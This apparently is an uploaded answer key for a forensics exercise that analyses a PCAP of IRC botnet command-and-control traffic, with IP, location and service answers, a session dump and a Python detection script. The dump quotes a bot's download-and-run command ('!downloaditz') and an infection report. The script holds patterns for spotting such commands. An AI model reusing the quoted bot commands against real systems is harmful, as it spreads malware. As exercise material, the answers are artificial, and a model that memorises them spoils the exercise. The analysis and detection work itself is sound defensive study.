Command and Control via IRC Analysis

The document analyzes network traffic from a PCAP file and identifies: 1. Three IP addresses are involved in the communication - one in France and two private IPs. 2. The private IPs are running DNS and message tracking services while the public IP runs a C&C server on port 5540. 3. The PCAP shows IRC communication between a client and C&C server where a virus was injected onto a system and the author attempted to distribute another executable file. This indicates an attack involving malware control over IRC.

Uploaded by rajuraikar

Answers:

---------------------------------------------------------------------------------------------------------------------------------------

Question 1. Write down the IP addresses of all the machines involved

Tool Used: Wireshark

Total IPs: 3

[Link]

[Link]

[Link]

---------------------------------------------------------------------------------------------------------------------------------------

Question 2. What is the location of these IP addresses?

Site Used: [Link]

IP: [Link]

Host name: [Link].

IP address: [Link]

Location: Paris, FRANCE

The IPs below are private IP addresses:

[Link]

[Link]

---------------------------------------------------------------------------------------------------------------------------------------

Question 3. What services run on these IP addresses?

On [Link], TCP port 5540 is in use; according to SANS, the service registered for this port is sdreport.

On [Link], UDP port 53 is in use, which is the DNS service.

On [Link], TCP port 1038 and UDP port 1037 are in use; according to SANS, the service is Message Tracking
Query Protocol (MTQP).

---------------------------------------------------------------------------------------------------------------------------------------

Question 4. Please explain the attack in detail and what you think is going on in this PCAP file:

From a quick glance at the PCAP file we can find Command and Control communication between client
and server via IRC, with the client using port tcp/1038 and the C&C server using tcp/5540.

IRC Server: [Link]

Nick Name: pLagUe{USA}64007

Message:

PRIVMSG ##verga## :.4.{. USB.4 }.. Injected Virus into .[Link].. on drive.4. D:

A virus was injected on the client.

Below is the IRC channel data:


PASS mierdaq

NICK pLagUe{USA}64007

USER SkuZ * ok .[Link] UniX b0at 0.4

:[Link] NOTICE AUTH :*** Looking up your hostname...

:[Link] NOTICE AUTH :*** Checking ident...

:[Link] NOTICE AUTH :*** No ident response; username prefixed with ~

:[Link] NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

PING :56EF9DAC

PONG 56EF9DAC

:[Link] 001 pLagUe{USA}64007 :Welcome to the AccesoX IRC Network pLagUe{USA}64007!~SkuZ@[Link]

:[Link] 002 pLagUe{USA}64007 :Your host is [Link], running version Unreal3.2.9-rc1

:[Link] 003 pLagUe{USA}64007 :This server was created ven mar 25 2011 at [Link] CET

:[Link] 004 pLagUe{USA}64007 [Link] Unreal3.2.9-rc1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ

:[Link] 005 pLagUe{USA}64007 CMDS=KNOCK,MAP,DCCALLOW,USERIP UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=16 CHANLIMIT=#:16 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 :are supported by this server

:[Link] 005 pLagUe{USA}64007 MAXTARGETS=20 WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ NETWORK=AccesoX CASEMAPPING=ascii EXTBAN=~,qjncrR ELIST=MNUCT :are supported by this server

:[Link] 005 pLagUe{USA}64007 STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

PRIVMSG ##verga## :.[Link] PuTo InfeCcIoN.


:[Link] 251 pLagUe{USA}64007 :There are 56 users and 189 invisible on 9 servers

:[Link] 252 pLagUe{USA}64007 8 :operator(s) online

:[Link] 253 pLagUe{USA}64007 1 :unknown connection(s)

:[Link] 254 pLagUe{USA}64007 30 :channels formed

:[Link] 255 pLagUe{USA}64007 :I have 28 clients and 0 servers

:[Link] 265 pLagUe{USA}64007 :Current Local Users: 28 Max: 196

:[Link] 266 pLagUe{USA}64007 :Current Global Users: 245 Max: 2976

:[Link] 372 pLagUe{USA}64007 :- This is the short MOTD. To view the complete MOTD type /motd

:[Link] 372 pLagUe{USA}64007 :-

:[Link] 376 pLagUe{USA}64007 :End of /MOTD command.

:pLagUe{USA}64007 MODE pLagUe{USA}64007 :+ix

:Global!services@[Link] NOTICE pLagUe{USA}64007 :[.Random News. - Oct 14 2010] Registren sus nick de nuevo ... gracias.

:NickServ!services@[Link] NOTICE pLagUe{USA}64007 :Your nick isn't registered.

:pLagUe{USA}64007 MODE pLagUe{USA}64007 :-ix

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

:pLagUe{USA}64007!~SkuZ@[Link] JOIN :##verga##

:[Link] 332 pLagUe{USA}64007 ##verga## :!downloaditz [Link] c:\[Link] 1

:[Link] 333 pLagUe{USA}64007 ##verga## ragebot 1298999449

:[Link] 353 pLagUe{USA}64007 @ ##verga## :pLagUe{USA}64007

:[Link] 366 pLagUe{USA}64007 ##verga## :End of /NAMES list.

:[Link] 404 pLagUe{USA}64007 ##verga## :You need voice (+v) (##verga##)

MODE ##verga## -ix

:[Link] 482 pLagUe{USA}64007 ##verga## :You're not channel operator

PRIVMSG ##verga## :.4.{. USB.4 }.. Injected Virus into .[Link].. on drive.4. D:

:[Link] 404 pLagUe{USA}64007 ##verga## :You need voice (+v) (##verga##)

PING :[Link]

PONG [Link]
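The channel data above shows three behaviours a defender can key on: a bot-style nick registration, a download command planted in the channel topic (the 332 reply), and an infection report sent to the channel as a PRIVMSG. The following is an added example, not part of the original answer key: a minimal RFC 1459 line parser with detection rules for exactly those three behaviours, run over sample lines constructed from the dump above. "[Link]" stands in for the addresses the page does not show, and the rule patterns (BOT_NICK, TOPIC_CMD) are assumptions derived from this capture only.

```python
import re

# Constructed sample modelled on the channel data above. "[Link]" stands in for
# the addresses the page does not show; "\x03N" is the mIRC colour code the bot
# emits, which the dump above renders as ".".
SAMPLE_LOG = [
    "NICK pLagUe{USA}64007",
    "USER SkuZ * ok .[Link] UniX b0at 0.4",
    "PING :56EF9DAC",
    "JOIN ##verga##",
    ":[Link] 332 pLagUe{USA}64007 ##verga## :!downloaditz [Link] c:\\[Link] 1",
    ":[Link] 333 pLagUe{USA}64007 ##verga## ragebot 1298999449",
    "PRIVMSG ##verga## :\x034{\x03 USB\x034 }\x03 Injected Virus into .[Link]. on drive\x034 D:",
]

# mIRC colour/bold/underline control codes, stripped before matching.
FORMAT_CODES = re.compile(r"\x03(?:\d{1,2}(?:,\d{1,2})?)?|[\x02\x0f\x16\x1d\x1f]")
# Assumed rule patterns (hypothetical, derived from this dump only).
BOT_NICK = re.compile(r"^[A-Za-z]+\{[A-Z]{2,3}\}\d{3,}$")     # pLagUe{USA}64007
TOPIC_CMD = re.compile(r"^!\w+\s+\S+\s+[A-Za-z]:\\")            # "!cmd <src> c:\<file> ..."


def parse_irc(line):
    """Split an RFC 1459 line into (prefix, command, middle params, trailing)."""
    prefix = None
    if line.startswith(":"):                      # server-originated line
        prefix, _, line = line[1:].partition(" ")
    middle, sep, trailing = line.partition(" :")  # trailing param starts at " :"
    parts = middle.split()
    if not parts:
        return None
    return prefix, parts[0].upper(), parts[1:], (trailing if sep else None)


def cnc_indicators(lines):
    """Return (indicator, evidence) pairs for the C&C behaviours in this capture."""
    findings = []
    for raw in lines:
        parsed = parse_irc(FORMAT_CODES.sub("", raw))
        if parsed is None:
            continue
        _prefix, cmd, params, trailing = parsed
        if cmd == "NICK" and params and BOT_NICK.match(params[0]):
            findings.append(("bot-style nick", params[0]))
        elif cmd == "332" and trailing and TOPIC_CMD.match(trailing):
            findings.append(("download command in channel topic", trailing))
        elif cmd == "PRIVMSG" and trailing and "injected" in trailing.lower():
            findings.append(("infection report to channel", trailing.strip()))
    return findings
```

Feed `cnc_indicators()` the reassembled TCP stream of the IRC session (for example, Wireshark's Follow TCP Stream output split into lines) to get the same three findings from a real capture.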

---------------------------------------------------------------------------------------------------------------------------------------
